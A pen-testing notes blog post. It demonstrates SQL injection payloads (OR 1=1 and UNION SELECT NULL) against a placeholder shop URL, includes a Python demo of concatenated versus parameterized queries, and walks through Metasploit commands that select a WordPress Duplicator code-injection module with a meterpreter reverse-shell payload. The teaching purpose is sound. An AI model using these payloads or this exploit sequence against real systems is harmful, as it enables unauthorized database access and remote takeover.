Pen Testing 3 SQL, Burp
Posted on February 1, 2015
Tags: hacksoft
1 URL search bar
The browser's address bar percent-encodes characters that are not plain ASCII: each byte of the character's UTF-8 encoding is sent as a percent sign followed by two hex digits.
- white space CAN be encoded either as + (in the query string) OR as its percent-hex form %20
- a UTF-8 character encodes to the percent-hex form of each of its bytes
- Target (the injectable parameter is ?category=Gifts):
https://insecure-website.com/products?category=Gifts
- attack 1:
https://insecure-website.com/products?category=Gifts'+OR+1=1--
- attack 2:
https://insecure-website.com/products?category=Gifts%27%20OR%201%3D1%20--
The + in attack 1 is decoded by the server as white space, NOT as a literal + character (a literal plus would have to be sent as %2B).
-- Original
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
-- Corrupted (the injected quote closes the string literal and -- starts a comment)
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
The trailing ' AND released = 1 gets commented out, so the resulting query is equivalent to SELECT * FROM products.
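As an added example (not code from the original post), the following Python shows how a server-side framework decodes both attack URLs above, how string concatenation produces the corrupted query, and how a bound parameter keeps the quote and the comment marker inside the value. The products table and its rows are constructed here.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample rows standing in for the page's "products" table.
ROWS = [("Mug", "Gifts", 1), ("Card", "Gifts", 0), ("Lamp", "Home", 1)]


def decode_category(url: str) -> str:
    """Return the ?category= value as a web framework would see it after decoding."""
    # parse_qs decodes %XX sequences and turns '+' into a space, exactly as the page describes.
    return parse_qs(urlsplit(url).query).get("category", [""])[0]


def vulnerable_query(category: str) -> str:
    """The page's 'Original' query built by string concatenation (the defect)."""
    return f"SELECT * FROM products WHERE category = '{category}' AND released = 1"


def _db() -> sqlite3.Connection:
    """In-memory SQLite database with the constructed products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", ROWS)
    return conn


def run_vulnerable(category: str) -> list:
    """Execute the concatenated query: the injected payload returns every row."""
    return _db().execute(vulnerable_query(category)).fetchall()


def run_parameterized(category: str) -> list:
    """Same query with a bound parameter: the payload is just a category name that matches nothing."""
    return _db().execute(
        "SELECT * FROM products WHERE category = ? AND released = 1", (category,)
    ).fetchall()


if __name__ == "__main__":
    attack1 = "https://insecure-website.com/products?category=Gifts'+OR+1=1--"
    payload = decode_category(attack1)
    print(payload)                       # Gifts' OR 1=1--
    print(vulnerable_query(payload))     # the corrupted query from the page
    print(len(run_vulnerable(payload)))  # 3: released filter commented out
    print(run_parameterized(payload))    # []: no category has that literal name
```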
1.1 Finding the number of columns
' UNION SELECT NULL,NULL--
- keep adding another NULL until the query succeeds; the number of NULLs that makes it go through is the number of columns the original query returns (NULL is used because it is compatible with every column type)
2 Metasploit
2.1 Startup
sudo msfdb init && msfconsole
# =[ metasploit v6.2.11-dev ]
# + -- --=[ 2233 exploits - 1179 auxiliary - 398 post ]
# + -- --=[ 867 payloads - 45 encoders - 11 nops ]
# + -- --=[ 9 evasion ]
# Metasploit tip: You can use help to view all
# available commands
# msf6 >
2.2 Find exploit
search name:wordpress
# Matching Modules
# ================
# # Name Disclosure Date Rank Check Description
# - ---- --------------- ---- ----- -----------
# 0 exploit/multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection
# 1 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
# 2 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
# 3 auxiliary/gather/wp_all_in_one_migration_export 2015-03-19 normal Yes WordPress All-in-One Migration Export
# 4 exploit/unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability
# 5 auxiliary/scanner/http/wordpress_login_enum normal No WordPress Brute Force and User Enumeration Utility
Select the module by its path:
use exploit/multi/php/wp_duplicator_code_inject
2.3 Show the exploit's available payloads
Nothing to configure here. It only lists the payloads compatible with the selected exploit, i.e. what gets executed on the target once the exploit succeeds.
show payloads
# Compatible Payloads
# ===================
# # Name Disclosure Date Rank Check Description
# - ---- --------------- ---- ----- -----------
# 0 payload/generic/custom normal No Custom Payload
# 1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
# 2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
# 3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
# 4 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
2.4 Show Targets
show targets
# Exploit targets:
# Id Name
# -- ----
# 0 WordPress Duplicator <= 1.2.40
2.5 Config options
show options
# Module options (exploit/multi/php/wp_duplicator_code_inject):
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# Proxies no A proxy chain of format type:host:port[,type:host:port][...]
# RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
# RPORT 80 yes The target port (TCP)
# SSL false no Negotiate SSL/TLS for outgoing connections
# TARGETURI /installer.php yes The TARGETURI where installer.php or installer-backup.php is located
# TIMEOUT 40 yes Timeout for web requests
# VHOST no HTTP server virtual host
# Payload options (php/meterpreter/reverse_tcp):
# Name Current Setting Required Description
# ---- --------------- -------- -----------
# LHOST yes The listen address (an interface may be specified)
# LPORT 4444 yes The listen port
# Exploit target:
# Id Name
# -- ----
# 0 WordPress Duplicator <= 1.2.40
RHOSTS takes a host name or IP address, not a URL; the path part belongs in TARGETURI (default /installer.php, shown above).
set RHOSTS somewebsite.com
set RPORT 80
2.6 Execute
exploit